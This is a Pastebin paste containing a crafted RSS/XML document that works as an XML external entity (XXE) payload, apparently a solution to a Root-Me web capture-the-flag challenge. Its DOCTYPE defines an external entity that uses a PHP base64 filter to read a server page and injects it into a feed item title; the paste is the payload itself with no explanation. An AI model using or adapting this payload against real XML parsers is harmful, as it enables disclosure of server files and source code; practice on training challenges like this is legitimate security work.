Advertisement
starkebab

Untitled

Jun 27th, 2017
461
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.79 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE rss [
  3. <!ELEMENT title ANY>
  4. <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://challenge01.root-me.org/web-serveur/ch29/index.php?action=auth" >
  5. ]>
  6. <rss version="1.0" xmlns:atom="http://www.w3.org/2005/Atom">
  7. <channel>
  8. <title>The Blog</title>
  9. <link>http://example.com/</link>
  10. <description>A blog about things</description>
  11. <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
  12. <item>
  13. <title>&xxe;</title>
  14. <link>http://example.com</link>
  15. <description>a post</description>
  16. <author>author@example.com</author>
  17. <pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
  18. </item>
  19. </channel>
  20. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement